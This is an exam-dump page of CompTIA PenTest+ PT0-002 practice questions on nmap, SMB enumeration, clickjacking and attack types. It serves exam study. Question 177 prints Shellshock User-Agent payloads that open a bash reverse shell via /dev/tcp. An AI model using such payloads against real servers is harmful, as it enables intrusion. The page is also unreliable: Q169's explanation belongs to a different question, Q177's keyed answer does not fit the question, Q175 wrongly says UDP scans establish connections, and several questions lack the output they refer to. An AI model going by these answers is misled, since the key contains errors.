Sep 25, 2025 Detailed New PT0-002 Exam Questions for Concept Clearance
PT0-002 Exam Preparation Material with New PT0-002 Dumps Questions.
The CompTIA PT0-002 certification exam covers topics related to penetration testing such as planning and scoping, information gathering and vulnerability identification, attacks, exploitation and post-exploitation techniques, reporting, and communication skills. The PT0-002 exam also tests the candidate's knowledge of legal and regulatory compliance requirements, standards, and ethical considerations. The CompTIA PenTest+ certification exam is vendor-neutral, meaning it is not limited to a particular software or hardware vendor. Successful completion of the exam indicates that the candidate possesses the skills and knowledge required to conduct a successful penetration test.
The CompTIA PT0-002 exam is an essential benchmark for any professional seeking to further their career in cybersecurity. The exam covers a broad range of topics including reconnaissance and footprinting, network scanning, enumeration, vulnerability discovery, exploitation, and post-exploitation. The examination is challenging: candidates must score 750 out of a possible 900 points to become certified.
NEW QUESTION # 166
Which of the following tools should a penetration tester use to crawl a website and build a wordlist using the data recovered to crack the password on the website?
- A. DirBuster
- B. Patator
- C. CeWL
- D. w3af
Answer: C
Explanation:
CeWL, the Custom Word List Generator, is a Ruby application that allows you to spider a website based on a URL and depth setting and then generate a wordlist from the files and web pages it finds. Running CeWL against a target organization's sites can help generate a custom word list, but you will typically want to add words manually based on your own OSINT gathering efforts.
https://esgeeks.com/como-utilizar-cewl/
NEW QUESTION # 167
A penetration tester is looking for a particular type of service and obtains the output below:
| Target is synchronized with 127.127.38.0 (reference clock)
| Alternative Target Interfaces:
|     10.17.4.20
| Private Servers (0)
| Public Servers (0)
| Private Peers (0)
| Public Peers (0)
| Private Clients (2)
|     10.20.8.69 169.254.138.63
| Public Clients (597)
|     4.79.17.248 68.70.72.194 74.247.37.194 99.190.119.152
|     12.10.160.20 68.80.36.133 75.1.39.42 108.7.58.118
|     68.56.205.98
|     2001:1400:0:0:0:0:0:1 2001:16d8:dd00:38:0:0:0:2
|     2002:db5a:bccd:1:21d:e0ff:feb7:b96f 2002:b6ef:81c4:0:0:1145:59c5:3682
| Other Associations (1)
|_ 127.0.0.1 seen 1949869 times, last tx was unicast v2 mode 7
Which of the following commands was executed by the tester?
- A. nmap -sU -pU:517 -Pn -n -script=supermicro-ipmi-config <target>
- B. nmap -sU -pU:37 -Pn -n -script=icap-info <target>
- C. nmap -sU -pU:161 -Pn -n -script=voldemort-info <target>
- D. nmap -sU -pU:123 -Pn -n -script=ntp-monlist <target>
Answer: D
Explanation:
The output provided indicates the use of the NTP protocol (Network Time Protocol) for querying a target system. The reference to "Public Clients" and the specific IP addresses listed, along with the mention of "Other Associations" and the use of NTP version 2, points towards the execution of an NTP monlist request. The monlist feature in NTP servers can be used to obtain a list of the last 600 hosts that have interacted with the NTP server. The command nmap -sU -pU:123 -Pn -n -script=ntp-monlist <target> specifically targets NTP servers on UDP port 123 to retrieve this information, making it the correct choice based on the output shown.
NEW QUESTION # 168
A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data. Which of the following should the tester do with this information to make this a successful exploit?
- A. Perform XSS.
- B. Use BeEF.
- C. Conduct a watering-hole attack.
- D. Use browser autopwn.
Answer: C
Explanation:
A clickjacking vulnerability allows an attacker to trick a user into clicking on a hidden element on a web page, such as a login button or a link. A watering-hole attack is a technique where the attacker compromises a website that is frequently visited by the target users, and injects malicious code or content into the website.
The attacker can then use the clickjacking vulnerability to redirect the users to a malicious website or perform unauthorized actions on their behalf.
A: Perform XSS. This is incorrect. XSS (cross-site scripting) is a vulnerability where an attacker injects malicious scripts into a web page that are executed by the browser of the victim. XSS can be used to steal cookies, session tokens, or other sensitive information, but it is not directly related to clickjacking.
B: Use BeEF. This is incorrect. BeEF (Browser Exploitation Framework) is a tool that allows an attacker to exploit various browser vulnerabilities and take control of the browser of the victim. BeEF can be used to launch clickjacking attacks, but it is not the only way to do so.
D: Use browser autopwn. This is incorrect. Browser autopwn is a feature of Metasploit that automatically exploits browser vulnerabilities and delivers a payload to the victim's system. Browser autopwn can be used to compromise the browser of the victim, but it is not directly related to clickjacking.
References:
* 1: OWASP Foundation, "Clickjacking", https://owasp.org/www-community/attacks/Clickjacking
* 2: PortSwigger, "What is clickjacking? Tutorial & Examples", https://portswigger.net/web-security/clickjacking
* 4: Akto, "Clickjacking: Understanding vulnerability, attacks and prevention", https://www.akto.io/blog/clickjacking-understanding-vulnerability-attacks-and-prevention
NEW QUESTION # 169
After running the enum4linux.pl command, a penetration tester received the following output:
Which of the following commands should the penetration tester run NEXT?
- A. smbclient //192.168.100.56/web -U '' -N
- B. smbget //192.168.100.56/web -U ''
- C. smbspool //192.160.100.56/print$
- D. net rpc share -S 192.168.100.56 -U ''
Answer: A
Explanation:
A vulnerability scan is a type of assessment that helps to identify vulnerabilities in a network or system. It scans systems for potential vulnerabilities, misconfigurations, and outdated software. Based on the output from a vulnerability scan, a penetration tester can identify vulnerabilities that may be exploited to gain access to a system. In this scenario, the output from the penetration testing tool shows that 100 hosts contained findings due to improper patch management. This indicates that the vulnerability scan detected vulnerabilities that could have been prevented through proper patch management. Therefore, the most likely test performed by the penetration tester is a vulnerability scan.
NEW QUESTION # 170
A penetration tester conducted a discovery scan that generated the following:
Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?
- A. nmap --open 192.168.0.1-254 | uniq
- B. nmap -sn 192.168.0.1-254 | grep "Nmap scan" | awk '{print $5}'
- C. nmap -oG list.txt 192.168.0.1-254 | sort
- D. nmap -o 192.168.0.1-254 | cut -f 2
Answer: B
Explanation:
The Nmap flag -sn performs host discovery and produces output of this kind, and the awk command selects column 5 ({print $5}), which carries the IP address of each responding host in the Nmap output.
This command generates the results shown in the image and transforms them into a list of active hosts for further analysis. The command consists of three parts:
* nmap -sn 192.168.0.1-254: uses nmap, a network scanning tool, to perform a ping scan (-sn) on the IP range 192.168.0.1-254, which sends ICMP echo requests to each IP address and checks whether it responds.
* grep "Nmap scan": uses grep, a text filtering tool, to keep only the lines containing the string "Nmap scan". This filters out the lines that show the start and end time of the scan and leaves only the lines that report each host.
* awk '{print $5}': uses awk, a text processing tool, to print the fifth field ($5) of each remaining line. This extracts only the IP address of each host and displays them as a list.
The final output will look something like this:
192.168.0.1
192.168.0.12
192.168.0.17
192.168.0.34
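As an added example (not code from the original page or the exam), the shell below runs the question's pipeline against a constructed sample of nmap -sn output and adds a hardened variant for two cases the $5 one-liner gets wrong: hosts with a reverse-DNS name, where field 5 is the hostname and the address sits in parentheses, and the "[host down]" report lines nmap prints when run with -v. SAMPLE_SCAN and both function names are assumptions.

```shell
# Added example, not from the original page: the question's pipeline on a
# constructed nmap -sn sample, plus a variant that handles reverse-DNS names
# and the "[host down]" lines that appear when nmap is run with -v.

# Constructed sample in the format nmap -sn prints (not output of a real scan).
SAMPLE_SCAN='Starting Nmap 7.94 ( https://nmap.org ) at 2025-01-01 12:00 UTC
Nmap scan report for 192.168.0.1
Host is up (0.0012s latency).
Nmap scan report for 192.168.0.5 [host down]
Nmap scan report for 192.168.0.12
Host is up (0.0034s latency).
Nmap scan report for printer.lan (192.168.0.17)
Host is up (0.0101s latency).
Nmap scan report for 192.168.0.34
Host is up (0.0008s latency).
Nmap done: 254 IP addresses (4 hosts up) scanned in 5.12 seconds'

# The one-liner from answer B, reading scan output on stdin. Field 5 is the
# address only when nmap printed a bare IP; with a PTR record it is the name,
# and a "[host down]" line still slips through.
active_hosts_naive() {
    grep "Nmap scan" | awk '{print $5}'
}

# Hardened variant: skip down hosts, take the last field, and drop the
# parentheses nmap puts around the address when a hostname precedes it.
active_hosts() {
    awk '/^Nmap scan report for/ && !/\[host down\]/ {
             ip = $NF; gsub(/[()]/, "", ip); print ip
         }'
}

# Compare the two on the sample: one address per line, ready for further scans.
printf '%s\n' "$SAMPLE_SCAN" | active_hosts_naive
echo ---
printf '%s\n' "$SAMPLE_SCAN" | active_hosts
```

The naive list contains printer.lan and the down host; the hardened list contains exactly the four addresses from the question's expected output.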
NEW QUESTION # 171
A penetration tester utilized Nmap to scan host 64.13.134.52 and received the following results:
Based on the output, which of the following services are MOST likely to be exploited? (Choose two.)
- A. SNMP
- B. SMTP
- C. HTTP
- D. DNS
- E. Telnet
- F. NTP
Answer: C,D
NEW QUESTION # 172
During an assessment, a penetration tester found an application with the default credentials enabled. Which of the following best describes the technical control required to fix this issue?
- A. System hardening
- B. Patch management
- C. Multifactor authentication
- D. Password encryption
Answer: A
Explanation:
* System hardening involves securing a system by reducing its attack surface, which includes changing default credentials, disabling unnecessary services, and applying security patches.
* Details:
A. System hardening: a comprehensive approach to securing the system, including changing default credentials.
B. Patch management: ensures software is up to date but does not directly address default credentials.
C. Multifactor authentication: adds an additional layer of security but does not solve the problem of default credentials being enabled.
D. Password encryption: secures stored passwords but does not address the issue of default credentials.
* Reference: System hardening is a fundamental practice in securing systems and preventing unauthorized access, as detailed in security best practices and guidelines.
NEW QUESTION # 173
The results of an Nmap scan are as follows:
Which of the following would be the BEST conclusion about this device?
- A. This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory.
- B. This device is most likely a proxy server forwarding requests over TCP/443.
- C. This device is most likely a gateway with in-band management services.
- D. This device may be vulnerable to remote code execution because of a buffer overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation.
Answer: C
Explanation:
The Heartbleed bug is an OpenSSL bug that does not affect SSH. Ref: https://www.sos-berlin.com/en/news-heartbleed-bug-does-not-affect-jobscheduler-or-ssh
NEW QUESTION # 174
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Answer:
Explanation:
1. Reflected XSS - Input sanitization (<> ...)
2. SQL injection (stacked) - Parameterized queries
3. DOM XSS - Input sanitization (<> ...)
4. Local file inclusion - Sandbox requests
5. Command injection - Sandbox requests
6. SQL injection (UNION) - Parameterized queries
7. SQL injection (error-based) - Parameterized queries
8. Remote file inclusion - Sandbox requests
9. Command injection - Input sanitization ($ ...)
10. URL redirect - Prevent external calls
NEW QUESTION # 175
A penetration tester is conducting an Nmap scan and wants to scan for ports without establishing a connection. The tester also wants to find version information for services running on open ports. Which of the following Nmap commands should the tester use?
- A. nmap -sU -sV -T4 -F target.company.com
- B. nmap -sX -sC target.company.com
- C. nmap -sS -sV -F target.company.com
- D. nmap -sT -v -T5 target.company.com
Answer: C
Explanation:
The Nmap command that the tester should use to scan for ports without establishing a connection and to find version data information for services running on open ports is nmap -sS -sV -F target.company.com. This command has the following options:
* -sS performs a TCP SYN scan, which sends TCP packets with the SYN flag set to the target ports and analyzes the responses. A TCP SYN scan does not establish a full TCP connection, as it only completes the first step of the three-way handshake, so the application listening on the port never sees a completed connection and is less likely to log the probe (network-level monitoring can still observe the SYN packets).
* -sV performs version detection, which is a feature that probes open ports to determine the service and version information of the applications running on them. Version detection can provide useful information for identifying vulnerabilities or exploits that affect specific versions of services or applications.
* -F performs a fast scan, which is a scan option that only scans the 100 most common ports according to the nmap-services file. A fast scan can speed up the scan process by avoiding scanning less likely or less interesting ports.
* target.company.com specifies the domain name of the target system or network to be scanned.
The other options do not meet the requirements of the question. Option A performs a UDP scan (-sU), which is a scan technique that sends UDP packets to the target ports and analyzes the responses. A UDP scan can scan for open ports that use the UDP protocol, such as DNS, SNMP, or DHCP.
However, a UDP scan does establish a connection with the target system or application, unlike a TCP SYN scan. Option D performs a TCP connect scan (-sT), which sends TCP packets with the SYN flag set to the target ports and completes the three-way handshake with an ACK packet if a SYN/ACK packet is received. A TCP connect scan can scan for open ports that use the TCP protocol, such as HTTP, FTP, or SSH. However, a TCP connect scan does establish a full TCP connection with the target system or application, unlike a TCP SYN scan. Option B performs an Xmas scan (-sX), which sends TCP packets with the FIN, PSH, and URG flags set to the target ports and analyzes the responses. An Xmas scan can scan for open ports without completing a connection, similar to a TCP SYN scan. However, option B does not perform version detection (-sV), which is one of the requirements of the question.
NEW QUESTION # 176
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)
- A. Retina
- B. Shodan
- C. Nessus
- D. Wireshark
- E. Nikto
- F. Burp Suite
Answer: B,D
Explanation:
Wireshark and Shodan are two tools that can be used to perform passive reconnaissance, which means collecting information from publicly available sources without interacting with the target or revealing one's identity. Wireshark is a tool that can be used to capture and analyze network traffic, such as packets, protocols, or sessions, without sending any data to the target. Shodan is a tool that can be used to search for devices or services on the internet, such as web servers, routers, cameras, or firewalls, without contacting them directly.
The other tools are not passive reconnaissance tools, but rather active reconnaissance tools, which means interacting with the target or sending data to it. Nessus and Retina are tools that can be used to perform vulnerability scanning, which involves sending probes or requests to the target and analyzing its responses for potential weaknesses. Burp Suite is a tool that can be used to perform web application testing, which involves intercepting and modifying web requests and responses between the browser and the server.
NEW QUESTION # 177
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
- A. exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
- B. exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
- C. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}
- D. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
Answer: D
NEW QUESTION # 178
Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?
- A. Remove the malware immediately.
- B. Stop the assessment and inform the emergency contact.
- C. Analyze the malware to see what it does.
- D. Do a root-cause analysis to find out how the malware got in.
- E. Collect the proper evidence and then remove the malware.
Answer: B
NEW QUESTION # 179
A security engineer is working to identify all email servers on a network. Which of the following commands should the engineer use to identify the servers as well as the software version the servers are running?
- A. nmap 10.0.0.1/24 -sT -sV -p 25,110,143,465,993,995
- B. nmap 10.0.0.1/24 -sS -sV -p 37,110,119,161,445,3389
- C. nmap 10.0.0.1/24 -sT -v -p 21,22,23,53,110,135
- D. nmap 10.0.0.1/24 -sA -sU -p 80,110,443,209,389,464
Answer: A
NEW QUESTION # 180
You are a penetration tester running port scans on a server.
INSTRUCTIONS
Part 1:Given the output, construct the command that was used to generate this output from the available options.
Part 2:Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Answer:
Explanation:
Part 1: 192.168.2.2 -O -sV --top-ports=100 and SMB vulns
Part 2: Weak SMB file permissions
https://subscription.packtpub.com/book/networking-and-servers/9781786467454/1/ch01lvl1sec13/fingerprinting
NEW QUESTION # 181
A penetration tester is preparing a credential stuffing attack against a company's website. Which of the following can be used to passively get the most relevant information?
- A. Maltego
- B. HaveIBeenPwned
- C. Shodan
- D. BeEF
Answer: B
Explanation:
HaveIBeenPwned is a website that allows users to check if their personal data has been compromised by data breaches. For a penetration tester preparing a credential stuffing attack, HaveIBeenPwned can provide valuable information about which accounts and passwords have been exposed, making them more likely targets for successful credential stuffing. This passive information gathering tool can help in identifying the most relevant credentials without actively probing the target's systems. The other tools listed (Shodan, BeEF, Maltego) serve different purposes, such as device and service enumeration, client-side exploitation, and information gathering through different means, respectively.
PT0-002 2025 Training With 460 QA's: https://skillmeup.examprepaway.com/CompTIA/braindumps.PT0-002.ete.file.html